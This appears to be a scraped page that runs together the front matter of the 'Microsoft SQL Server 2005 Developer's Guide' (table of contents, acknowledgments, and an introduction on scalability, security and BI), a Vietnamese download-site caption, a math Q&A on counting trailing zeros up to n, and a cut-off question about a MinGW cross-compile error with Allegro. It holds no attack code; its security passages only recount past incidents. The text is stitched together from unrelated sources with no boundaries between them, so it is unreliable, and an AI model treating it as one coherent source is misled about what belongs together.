8. Contents vii SQL Server Service Broker Activation . . . . . . . . . . . . . . . . . . . . . . . . . . . 131 Dialog Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132 System Views . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133 Chapter 5 Developing with Notification Services . . . . . . . . . . . . . . . . . . . . 135 Notification Services Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 136 Events . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 136 Subscriptions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 138 Notifications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 138 Developing Notification Services Applications . . . . . . . . . . . . . . . . . . . . . . . 139 Defining the Application . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 139 Compiling the Application . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 139 Building the Notification Subscription Management Application . . . . . . . . . . . 140 Adding Custom Components . . . . . . . . . . . . . . . . . . . . . . . . . . . . 140 Notification Services Application Sample . . . . . . . . . . . . . . . . . . . . . . . . . . 140 Creating the ICF File . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 140 Defining the ADF File . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144 Building the Notification Services Application . . . . . . . . . . . . . . . . . . . 152 Updating Notification Services Applications . . . . . . . . . . . . . . . . . . . . . . . . 157 Building a .NET Subscription/Event Application . . . . . . . . . . . . . . . . . . . . . . 158 Listing Subscriptions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 159 Adding Subscriptions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 160 Deleting Subscriptions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 163 Firing the Data Event Using .NET . . . . . . . . . . . . . . . . . . . . . . . . . 163 Firing the Data Event Using T-SQL . . . . . . . . . . . . . . . . . . . . . . . . . 166 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 167 Chapter 6 Developing Database Applications with ADO.NET . . . . . . . . . . . . . 169 The ADO.NET Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 170 ADO.NET Namespaces . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 172 .NET Data Providers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 172 Namespaces for the .NET Data Providers . . . . . . . . . . . . . . . . . . . . . . 173 Core Classes for the .NET Data Providers . . . . . . . . . . . . . . . . . . . . . . 175 Core Classes in the ADO.NET System.Data Namespace . . . . . . . . . . . . . . . . . . . 177 DataSet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178 DataTable . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
9. viii M i c r o s o f t S Q L S e r v e r 2 0 0 5 D e v e l o p e r ’s G u i d e DataColumn . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179 DataRow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180 DataView . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180 DataViewManager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180 DataRelation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 181 Constraint . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 181 ForeignKeyConstraint . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 181 UniqueConstraint . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 181 DataException . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 182 Using the .NET Framework Data Provider for SQL Server . . . . . . . . . . . . . . . . . . 182 Adding the System.Data.SqlClient Namespace . . . . . . . . . . . . . . . . . . . 182 Using the SqlConnection Object . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 183 The .NET Framework Data Provider for SQL Server Connection String Keywords . . . . . . . . . . . . . . . . . . . . . . . . . . 184 Opening a Trusted Connection . . . . . . . . . . . . . . . . . . . . . . . . . . . 186 Using Connection Pooling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 187 Using the SqlCommand Object . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 190 Executing Dynamic SQL Statements . . . . . . . . . . . . . . . . . . . . . . . . 191 Executing Parameterized SQL Statements . . . . . . . . . . . . . . . . . . . . . 193 Executing Stored Procedures with Return Values . . . . . . . . . . . . . . . . . . 196 Executing Transactions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 198 Using the SqlDependency Object . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 201 Using the SqlDataReader Object . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 204 Retrieving a Fast Forward–Only Result Set . . . . . . . . . . . . . . . . . . . . . 205 Reading Schema-Only Information . . . . . . . . . . . . . . . . . . . . . . . . 208 Asynchronous Support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 209 Multiple Active Result Sets (MARS) . . . . . . . . . . . . . . . . . . . . . . . . . 210 Retrieving BLOB Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 212 Using the SqlDataAdapter Object . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 215 Populating the DataSet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 215 Using the CommandBuilder Class . . . . . . . . . . . . . . . . . . . . . . . . . 216 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 220 Chapter 7 Developing with XML . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 221 The XML Data Type . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 222 Data Validation Using an XSD Schema . . . . . . . . . . . . . . . . . . . . . . . 223 XQuery Support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 227 Querying Element Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 228
10. Contents ix XML Data Type Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 231 Exist(XQuery) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 231 Modify(XML DML) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 232 Query(XQuery) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 233 Value(XQuery, [node ref]) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 234 XML Indexes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 235 Primary XML Indexes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 235 Secondary XML Indexes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 235 Using the For XML Clause . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 236 For XML Raw . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 236 For XML Auto . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 237 For XML Explicit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 237 Type Mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 239 FOR XML Path . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 240 Nested FOR XML Queries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 242 Inline XSD Schema Generation . . . . . . . . . . . . . . . . . . . . . . . . . . 242 OPENXML . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 244 XML Bulk Load . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 245 Native HTTP SOAP Access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 247 Creating SOAP Endpoints . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 247 Using SOAP Endpoints . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 249 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 253 Chapter 8 Developing Database Applications with ADO . . . . . . . . . . . . . . . . 255 An Overview of OLE DB . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 256 OLE DB Architecture Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 256 ADO (ActiveX Data Objects) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 258 OLE DB and ADO Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 260 ADO Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 260 An Overview of Using ADO . . . . . . . . . . . . . . . . . . . . . . . . . . . . 262 Adding the ADO Reference to Visual Basic . . . . . . . . . . . . . . . . . . . . . . . . . 263 Using ADO Objects with Visual Basic . . . . . . . . . . . . . . . . . . . . . . . . . . . . 264 Connecting to SQL Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 265 Retrieving Data with the ADO Recordset . . . . . . . . . . . . . . . . . . . . . . 281 Executing Dynamic SQL with the ADO Connection Object . . . . . . . . . . . . . . 305 Modifying Data with ADO . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 307 Executing Stored Procedures with Command Objects . . . . . . . . . . . . . . . . 316 Error Handling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 318
11. x M i c r o s o f t S Q L S e r v e r 2 0 0 5 D e v e l o p e r ’s G u i d e Advanced Database Functions Using ADO . . . . . . . . . . . . . . . . . . . . . . . . . 320 Batch Updates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 320 Using Transactions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 322 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 324 Chapter 9 Reporting Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 325 Reporting Services Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 326 Reporting Services Components . . . . . . . . . . . . . . . . . . . . . . . . . . 327 Installing Reporting Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . 329 Report Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 336 Report Server Processors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 337 Report Server Extensions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 338 Report Manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 340 Reporting Services Configuration and Management Tools . . . . . . . . . . . . . . . . . 341 Reporting Services Configuration Tool . . . . . . . . . . . . . . . . . . . . . . . 342 Report Server Command-Prompt Utilities . . . . . . . . . . . . . . . . . . . . . 344 Report Authoring Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 348 Report Designer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 348 Report Model Designer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 353 Report Builder . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 357 Programmability . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 359 Using URL Access in a Window Form . . . . . . . . . . . . . . . . . . . . . . . . 359 Integrating Reporting Services Using SOAP . . . . . . . . . . . . . . . . . . . . . 361 Extensions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 361 RDL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 362 Accessing Reports . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 362 Using URL Access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 362 URL Access Through a Form POST Method . . . . . . . . . . . . . . . . . . . . . 363 Report Authoring . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 363 Development Stages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 363 Creating a Reporting Services Report . . . . . . . . . . . . . . . . . . . . . . . 364 Deploying a Reporting Services Report . . . . . . . . . . . . . . . . . . . . . . . 369 Running a Reporting Services Report . . . . . . . . . . . . . . . . . . . . . . . 369 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371 Chapter 10 SQL Server Integration Services . . . . . . . . . . . . . . . . . . . . . . . 373 An Overview of SQL Server Integration Services . . . . . . . . . . . . . . . . . . . . . . 374 Data Transformation Pipeline (DTP) . . . . . . . . . . . . . . . . . . . . . . . . 375 Data Transformation Runtime (DTR) . . . . . . . . . . . . . . . . . . . . . . . . 376
12. Contents xi Creating Packages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 377 Using the SSIS Import and Export Wizard . . . . . . . . . . . . . . . . . . . . . 377 Using the SSIS Designer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 378 Using Breakpoints . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 395 Using Checkpoints . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 397 Using Transactions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398 Package Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 399 Deploying Packages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 399 Creating Configurations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 400 Using the Package Deployment Utility . . . . . . . . . . . . . . . . . . . . . . . 403 Programming with the SQL Server Integration Services APIs . . . . . . . . . . . . . . . . 404 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 412 Chapter 11 Developing BI Applications with ADOMD.NET . . . . . . . . . . . . . . . 415 Analysis Services Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 416 XML for Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 417 Analysis Management Objects (AMO) Overview . . . . . . . . . . . . . . . . . . 417 ADOMD.NET Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 418 AMO Hierarchy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 418 ADOMD.NET Object Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 419 Building a BI Application with ADOMD.NET . . . . . . . . . . . . . . . . . . . . . . . . 421 Adding a Reference for ADOMD.NET . . . . . . . . . . . . . . . . . . . . . . . . 422 Using the AdomdConnection Object . . . . . . . . . . . . . . . . . . . . . . . . 423 Using the AdomdCommand Object . . . . . . . . . . . . . . . . . . . . . . . . . 427 Using the AdomdDataAdapter Object . . . . . . . . . . . . . . . . . . . . . . . 434 Using the CubeDef Object . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 436 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 437 Chapter 12 Developing with SMO . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 439 Using SMO . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 440 Adding SMO Objects to Visual Studio . . . . . . . . . . . . . . . . . . . . . . . . 441 Creating the Server Object . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 442 Using SMO Properties . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 444 SMO Property Collections . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 445 SMO Hierarchy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 449 Building the SMO Sample Application . . . . . . . . . . . . . . . . . . . . . . . . . . . 459 Creating the Server Object . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 460 Listing the Registered SQL Systems . . . . . . . . . . . . . . . . . . . . . . . . 461 Connecting to the Selected SQL Server System . . . . . . . . . . . . . . . . . . . 461
13. xii M i c r o s o f t S Q L S e r v e r 2 0 0 5 D e v e l o p e r ’s G u i d e Listing Databases . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 463 Listing Tables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 464 Listing Columns . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 465 Retrieving Column Attributes . . . . . . . . . . . . . . . . . . . . . . . . . . . 467 Creating Databases . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 468 Transferring Tables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 469 Showing T-SQL Script for Tables . . . . . . . . . . . . . . . . . . . . . . . . . . 472 SMO Error Handling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 474 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 475 Chapter 13 Using sqlcmd . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 477 sqlcmd Components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 478 Command Shell . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 478 Command-Line Parameters . . . . . . . . . . . . . . . . . . . . . . . . . . . . 479 sqlcmd Extended Commands . . . . . . . . . . . . . . . . . . . . . . . . . . . 484 sqlcmd Variables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 484 Developing sqlcmd Scripts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 485 Developing sqlcmd Scripts with Query Editor . . . . . . . . . . . . . . . . . . . . 485 Using sqlcmd Variables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 487 Using sqlcmd Script Nesting . . . . . . . . . . . . . . . . . . . . . . . . . . . . 488 Using sqlcmd Variables and T-SQL Statements . . . . . . . . . . . . . . . . . . . 489 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 490 Appendix SQL Profiler . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 491 Starting SQL Profiler . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 491 Starting, Pausing, and Stopping a Trace . . . . . . . . . . . . . . . . . . . . . . . . . . 496 Replaying a Trace . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 497 Showplan Events . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 497 Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 501
14. Acknowledgments T his book is the successor to the SQL Server 2000 Developer’s Guide, which was extremely successful thanks to all of the supportive SQL Server developers who bought that edition of the book. Our first thanks go to all of the people who encouraged us to write another book about Microsoft’s incredible new relational database server: SQL Server 2005. Making a book is definitely a team effort, and this book is the epitome of that. We’d like to extend our deepest gratitude to the team at McGraw-Hill/Osborne, who helped to guide and shape this book as it progressed through its many stages. First, we’d like to thank Wendy Rinaldi, editorial director, for her encouragement in getting this project launched and her on-going support. We’d also like to thank acquisitions coordinator Alex McDonald for spearheading the effort to bring this project home. The book’s content benefited immensely from the efforts of project editor Carolyn Welch, technical reviewer Karl Hilsmann, and copy editor Bob Campbell. We’d also like to thank Tom Rizzo and Bill Baker from Microsoft for helping us to understand better where the product is headed and the emerging importance of BI and SQL Server 2005. xiii Copyright © 2006 by The McGraw-Hill Companies. Click here for terms of use.
15. Introduction S QL Server 2005 is a feature-rich release that provides a host of new tools and technologies for the database developer. This book is written to help database developers and DBAs become productive immediately with the new features and capabilities found in SQL Server 2005. This book covers the entire range of SQL Server 2005 development technologies from server side development using T-SQL to client side development using ADO, ADO.Net, and ADOMD.NET. In addition, it shows how to develop applications using the new SQL Server 2005 Notification Services, SQL Server Service Broker, Reporting Services, and SQL Server Integration Services subsystems. The development management landscape for SQL Server 2005 has changed tremendously in SQL Server 2005, so Chapter 1 starts off by providing a guided tour of the new development and management tools in SQL Server 2005. Although SQL Server 2005 certainly embodies a huge number of significant changes, some things have stayed the same and one of those things is the fact that T-SQL is still the native development language for SQL Server 2005 and is the core for all SQL Server 2005 database development. Chapter 2 shows you how to use the new T-SQL development tools found in both SQL Server 2005 and Visual Studio 2005 as well as how to create both T-SQL DDL and DML solutions. Chapter 3 dives into the new SQL CLR integration capabilities of SQL Server 2005. The integration of the .NET CLR runtime with SQL Server 2005 is one of the biggest new changes in SQL Server 2005. This chapter shows you how to create and use all of the new SQL CLR database objects, including stored procedures, functions, triggers, user-defined types, and user-defined aggregates. Chapter 4 introduces the new SQL Server Service Broker subsystem that provides the basis for building asynchronous applications. Both the SQL Service Broker chapter and the Notification Services chapter (Chapter 5) provide an overview of the new subsystem and then go on to show how they are used in a sample application. ADO.NET is Microsoft’s core data access technology, and Chapter 6 illustrates how to use all the primary ADO.NET objects to create robust data applications. The integration of XML with the relational database engine is another one of the big enhancements in SQL Server 2005. Chapter 7 shows how to use the new XML data type for both typed and untyped data as well as xiv Copyright © 2006 by The McGraw-Hill Companies. Click here for terms of use.
16. Introduction xv how to create Web Services that expose SQL Server stored procedures for heterogeneous platform integration. While most of this book concentrates on the newest .NET and XML-based technologies, the majority of SQL Server client applications are written in ADO and VB6. Chapter 8 illustrates all of the primary ADO techniques for building SQL Server database applications. Two of the hottest technologies in SQL Server 2005 are Reporting Services and the end-user oriented Report Builder report designer application. Chapter 9 dives into both of these new features, showing you how to build reports using Reporting Services as well as how to set up data models for use with Report Builder. Chapter 10 introduces the new SQL Server Integration Services subsystem. SQL Server Integration Services completely replaces the older DTS subsystem, and this chapter shows you how to build and deploy SSIS packages using the designer and the SSIS API. Chapter 11 illustrates building client Business Intelligence applications for Analysis Services using the new ADOMD.NET data access programming framework. SQL Server 2005 also introduces another completely new management framework called System Management Objects (SMO), which replaces the older Distributed Management Objects (DMO) object framework that was used in earlier versions of SQL Server. In Chapter 12 you can see how SMO can be used to build your own customized SQL Server management applications. SQL Server 2005 also provides an entirely new command line interface called sqlcmd that replaces the older isql and osql utilities. In Chapter 13 you can see how to develop management and data access scripts using the sqlcmd tool. Finally, this book concludes with an introduction to using SQL Profiler. SQL Profiler is key tool for both troubleshooting application performance as well as fine-tuning your data access queries. All of the code presented in this book is available for download from McGraw-Hill/ Osborne’s web site at www.osborne.com, and from our web site at www.teca.com. SQL Server 2005’s Design Goals SQL Server 2005 faces a much different challenge today than it did in the eighties when SQL Server was first announced. Back then ease-of-use was a priority and having a database scaled to suit the needs of a small business or a department was adequate. Today SQL Server is no longer a departmental database. It’s a full-fledged enterprise database capable of providing the data access functionality to the largest of organizations. To meet these enterprise demands, Microsoft has designed SQL Server 2005 to be highly scalable. In addition, it must also be secure; it must be able to be easily integrated with other platforms; it must be a productive development platform; and it must provide good return on investment.
17. xvi M i c r o s o f t S Q L S e r v e r 2 0 0 5 D e v e l o p e r ’s G u i d e Scalability Scalability used to be an area where Microsoft SQL Server was criticized. With its roots as a departmental system and the limitations found in the Microsoft SQL Server 6.5 and earlier releases, many businesses didn’t view SQL Server as a legitimate player in the enterprise database market. However, all that has changed. Beginning with the release of SQL Server 7, Microsoft made great strides in the scalability of the SQL Server platform. Using distributed partitioned views, SQL Server 7 jumped to the top of the TPC-C, and, in fact, its scores were so overwhelming that SQL Server 7 was a contributing factor to the TPC (Transaction Processing Councils) decision to break the transactional TPC-C test into clustered and nonclustered divisions. Although Microsoft and SQL Server 7 owned the clustered TPC-C score, demonstrating its ability to scale out across multiple systems, there was still some doubt about the platform’s ability to scale up on a single platform. That too changed with the launch of Windows Server 2003 and the announcement of SQL Server 2000 Enterprise Edition 64-bit where Microsoft announced that for the first time Microsoft SQL Server reached the top of the nonclustered TPC-C scores. Today, with the predominance of web-based applications, scalability is more important than ever. Unlike traditional client/server and intranet applications, where you can easily predict the number of application users, web applications open up the door for very large numbers of users and rapid changes in resource requirements. SQL Server 2005 embodies the accumulation of Microsoft’s scalability efforts, and builds on both the ability to scale out using distributed partitioned views as well as the ability to scale up using its 64-bit edition. Its TPC-C scores clearly demonstrate that SQL Server 2005 can deal with the very largest of database challenges—even up to the mainframe level. And the SQL Server 2005’s self-tuning ability enables the database to quickly optimize its own resources to match usage requirements. Security While scalability is the stepping stone that starts the path toward enterprise-level adoption, security is the door that must be passed to really gain the trust of the enterprise. In the past, SQL Server, like many other Microsoft products, has been hit by a couple of different security issues. Both of these issues tended to be related to implementation problems rather than any real code defects. A study by one research firm showed that up to 5,000 SQL Server systems were deployed on the Internet with a blank sa password, allowing easy access to any intruders who wanted to compromise the information on those systems. Later, in 2002, the SQL Slammer virus exploited a SQL Server known vulnerability for which Microsoft had previously released a fix and even incorporated that fix into a general service pack.
18. Introduction xvii In the first case, SQL Server essentially had the answer to this issue, supporting both standard security as well as Windows authentication; the users simply didn’t take some very basic security steps. In the second case, Microsoft had generated a fix to a known problem but that fix wasn’t widely applied. Plus, there was another basic security issue with this incident in which one of the ports on the firewall that should have been closed was left open by the businesses that were stricken by this virus. To address these types of security challenges, SQL Sever 2005 has been designed following Microsoft’s new security framework, sometimes called SD3 where the product is secure by design, secure by default, and secure by deployment. What this means for SQL Server 2005 is that the product is initially designed with an emphasis on security. Following up on their Trustworthy Computing initiative, Microsoft embarked on extensive security training for all of their developers and conducted code reviews and performed a comprehensive thread analysis for SQL Server 2005. In addition, all of the security fixes that were incorporated into the SP3 of SQL Server 2000 were rolled into SQL Server 2005. Next, secure by default means that when the product is installed Microsoft provides secure default values in the installation process whereby if you just follow the defaults you will end up with a secure implementation. For example, in the case of the sa password, the installation process prompts you to provide a strong password for the sa account. While you can select to continue the installation with a blank password, you have to explicitly select this path as well as respond to the Microsoft dialogs warning you about the dangers of using a blank password. Finally, SQL Server 2005 is secure by deployment, which means that Microsoft is providing tools and training for customers to help create secure deployments for SQL Server 2005. Here, Microsoft provides tools like the Microsoft Baseline Security Analysis, which can scan for known security vulnerabilities, in addition to a collection of white papers that are designed to educate customers on the best practices for creating secure implementations for a variety of different deployment scenarios. Integration In today’s corporate computing environment it’s rarely the case where only one vendor’s products are installed in a homogenous setting. Instead, far more often, multiple dissimilar platforms simultaneously perform a variety of disparate tasks, and one of an organization’s main challenges is exchanging information between these different platforms. SQL Server 2005 provides a number of different mechanisms to facilitate application and platform interoperability. For application interoperability, SQL Server 2005 supports the industry standard HTTP, XML, and SOAP protocols. It also allows stored procedures to be exposed as web services and provides a level 4
19. xviii M i c r o s o f t S Q L S e r v e r 2 0 0 5 D e v e l o p e r ’s G u i d e JDBC driver, allowing SQL Server to be used as a back-end database for Java applications. For platform interoperability, SQL Server 2005 sports an all-new redesigned Integration Services as well as heterogeneous database replication to Access, Oracle, and IBM DB2 UDB systems. Productivity Productivity is one of the other primary ingredients that enterprises require, and this is probably the area where SQL Server 2005 has made the biggest strides. The new release of SQL Server 2005 integrates the .NET Framework CLR into the SQL Server database engine. This new integration allows database objects like stored procedures, triggers, and user-defined functions to be created using any .NET compliant language including C#, VB.NET managed C++, and J#. Prior to this release SQL Server only supported the procedural T-SQL language for database programmability. The integration of the .NET Framework brings with it a fully object-oriented programming model that can be used to develop sophisticated data access and business logic routines. Being able to write database objects using the .NET languages also facilitates the ability to easily move those database objects between the database and the data access layer of an n-tiered web application. Although the big news with this release is the .NET Framework, Microsoft has continued to enhance T-SQL, as well as bring several new capabilities to their procedural language and the reassurance to developers and DBAs that they have no plans for dropping support for T-SQL in the future. In addition, SQL Server 2005 answers the question of productivity from the DBA’s perspective as well. The management console has been redesigned and integrated into a Visual Studio .NET integrated development environment. All of the dialogs are now fully modal, allowing the DBA to easily switch between multiple management tasks. Return on Investment One of the primary challenges for IT enterprises today is driving cost out of their businesses. That often means doing more with less, and SQL Server provides the tools that most businesses need to do more with the assets they already have. SQL Server 2005 is far more than just a relational database; its tightly integrated Business Intelligence (BI) toolset, including the built-in Analysis Services and Reporting Services, brings more value to the table than any other database platform. BI gives companies the ability to analyze data and make better business decisions—decisions that can make your company money as well as save your company money. Since the release of SQL Server 7, with its integrated OLAP Services (later renamed as Analysis Services), SQL Server has become the leading product in the BI market.
CÓ THỂ BẠN MUỐN DOWNLOAD
|
# What is sum of occurrences of zeros, at the end of integers, up to number $n$?
What is sum of occurrences of zeros, at the end of integers, up to number $n$ ? Let's call this function $O(n)$ Examples :
$1,2,3,4,5,6,7,8,9,10,$so $O(10)=1$
$1,...,20,$ so $O(20)=2$ $O(100)=11$
$O(200)=22$
$O(300)=33$
$O(300)=33$
$O(1000)=111$
-
Would $O(0)=1$ as it ends in a zero? This could make for an unusual sequence or is this function defined only for Natural numbers? – JB King Mar 19 '13 at 16:28
@JB King good point, sometimes strange things happen aroud the zero :) – Qbik Mar 19 '13 at 16:30
Given a number $n$, the number within the range (1,n) with the most occurrence of trailing zeros is =number_of_digits_in_n - 1=$\log(n)$ So we need to find the occurrence of multiple of $10_s$ upto $10^{\lfloor \log(n) \rfloor}$. Each occurrence is $\lfloor \frac{n}{10^i}\rfloor \forall i\le\lfloor \log(n) \rfloor$ So we just have to sum all such occrances
$$O(n)=\sum^{\lfloor \log(n)\rfloor}_{i=1} \left\lfloor\dfrac{n}{ 10^i}\right\rfloor$$
If you want the number of zeros less than a number $n$, note that a zero gets added if we hit a multiple of $10$, $2$ zeros get added if we hit a multiple of $100$ and in general $k$ zeros get added if we hit a multiple of $10^k$. Hence, the number of zeros is $$\left\lfloor\dfrac{n}{10}\right\rfloor + \left\lfloor\dfrac{n}{10^2}\right\rfloor + \left\lfloor\dfrac{n}{10^3}\right\rfloor + \cdots$$
yes, but what about closed form solution ? it seems to have something to do with n(n+1) sum ? – Qbik Mar 19 '13 at 16:23
@Qbik Just as in the $p$-adic valuation of $n!$, it's $(n - \delta(n))/9$, where $\delta(n)$ is the "sum of digits" function. It has nothing to do with $n(n+1)$ that I can tell. – Erick Wong Mar 19 '13 at 16:35
|
# MinGW Windows Cross-Compile Error
While I was developing my game on Linux (I'm using an ARM system), I decided that I want to cross-compile it to Windows. Yet, I get an error while I try to link Allegro (version 4.2) to the compiler.
I have installed MinGW32 (x86_64-w64-mingw32-c++ in the terminal) and have moved the bin / include / lib folders from the Windows Allegro version to the /usr/x86_64-w64-mingw32-c++/ folder.
